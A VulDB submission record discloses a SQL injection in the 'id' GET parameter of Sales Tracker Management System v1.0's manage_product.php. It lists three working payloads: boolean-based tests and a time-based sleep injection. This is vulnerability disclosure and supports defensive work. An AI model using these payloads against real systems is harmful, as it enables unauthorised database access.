| Titre | Sales Tracker Management System v1.0 /php-sts/admin/products/manage_product.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Sales Tracker Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /php-sts/admin/products/manage_product.php?id.
Payload1:id=1' and 'a'='a
Payload2:id=1' and 'a'='z
Payload3:id=1' and (select 1 from (select(sleep(10)))x) and 'q'='q |
|---|
| La source | ⚠️ https://github.com/graywar1/bug_report/blob/main/SQLi.md |
|---|
| Utilisateur | Peony (UID 44700) |
|---|
| Soumission | 11/04/2023 06:17 (il y a 3 ans) |
|---|
| Modérer | 11/04/2023 18:30 (12 hours later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 225530 [SourceCodester Sales Tracker Management System 1.0 GET Parameter manage_product.php ID injection SQL] |
|---|
| Points | 19 |
|---|